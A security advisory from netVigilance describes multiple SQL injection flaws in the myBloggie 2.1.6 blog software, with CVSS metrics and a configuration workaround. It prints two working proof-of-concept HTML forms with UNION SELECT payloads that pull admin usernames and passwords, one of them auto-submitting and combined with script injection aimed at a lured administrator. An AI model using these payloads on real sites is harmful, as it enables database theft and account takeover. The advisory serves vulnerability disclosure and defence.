myBloggie version 2.1.6 Multiple SQL Injection Vulnerability

2008-07-01 / 2008-07-02
Risk: Medium
Local: No
Remote: Yes

netVigilance Security Advisory #40 myBloggie version 2.1.6 Multiple SQL Injection Vulnerability Description: myBloggie ( is considered one of the most simple, user-friendliest yet packed with features Weblog system available to date. Built using PHP & mySQL, web most popular scripting language & database system enable myBloggie to be installed in any webservers. A security problem in the product allows attackers to commit SQL injection. External References: Mitre CVE: CVE-2007-1899 NVD NIST: CVE-2007-1899 OSVDB: Summary: myBloggie is weblog system built using PHP & mySQL, the webs most popular scripting language & database system which enable myBloggie to be installed in any webserver. Successful exploitation requires PHP magic_quotes_gpc set to Off and register_globals set to &#65533;On&#65533;. Advisory URL: Release Date: June 30th 2008 Severity/Risk: Medium CVSS 2.0 Metrics Access Vector: Network Access Complexity: High Authentication: Not-required Confidentiality Impact: Partial Integrity Impact: Partial Availability Impact: Partial CVSS 2.0 Base Score: 5.1 Target Distribution on Internet: Low Exploitability: Functional Exploit Remediation Level: Workaround Report Confidence: Uncorroborated Vulnerability Impact: Attack Host Impact: SQL Injection. SecureScout Testcase ID: TC 17969 Vulnerable Systems: myBloggie version 2.1.6 Vulnerability Type: SQL injection allows malicious people to execute their own SQL scripts. This could be exploited to obtain sensitive data, modify database contents or acquire administrator&#65533;s privileges. Vendor: myWebland ( Vendor Status: The Vendor has been notified April 9th 2007, but did not respond. Workaround: In the php.ini file set magic_quotes_gpc = On and/or register_globals=Off Example: SQL Injection Vulnerability 1: Create html file with the next content: <html> <body> <form action="http://[TARGET]/[MYBLOGGIE-DIRECTORY]/index.php?mode=viewuser" method="POST"> <input type="submit" name="user_id" value="1 #' UNION SELECT CONCAT(`mb_user`.`user`,' -> ',`mb_user`.`password`),1,1,1,1,1,1,1,1,1 FROM `mb_user` /*"> </form> </body> </html> REQUEST: Browse this file and click on the button REPLY: <tr><td colspan="3" class="spacer6"></td></tr> <tr><td></td><td></td><td align="right"> <span class="f10pxgrey">Category : <a class="std" href="?mode=viewcat&amp;cat_id=1"> [SQL INJECTION RESULT - ADMIN NAME] -> [SQL INJECTION RESULT - ADMIN PASSWORD]</a> Posted By : <b>1</b> | <img src="./templates/aura/images/comment.gif" alt="" /> <a class="std" href="?mode=viewid&amp;post_id=1">Comments</a>[1] | <img src="./templates/aura/images/trackback.gif" /> SQL Injection Vulnerability 2: (SQL Injection + XSS Attack Vulnerability) Create html file with the next content and place it for example on <html> <body onLoad="document.forms(0).submit();"> <form action=" http://[TARGET]/[MYBLOGGIE-DIRECTORY]/admin.php?mode=edit" method="POST"> <input type="hidden" name="post_id" value="-1' UNION SELECT 1,2, CONCAT(`mb_user`.`user`,' -> ', `mb_user`.`password`), '</textarea><script>alert(</script>', 5,6,7 FROM `mb_user`#"> </form> </body> </html> REQUEST: Induce a Mybloggie admin to browse the malicious page. http:// REPLY: Page containing username and password for Mybloggie admin account. Credits: Jesper Jurcenoks Co-founder netVigilance, Inc


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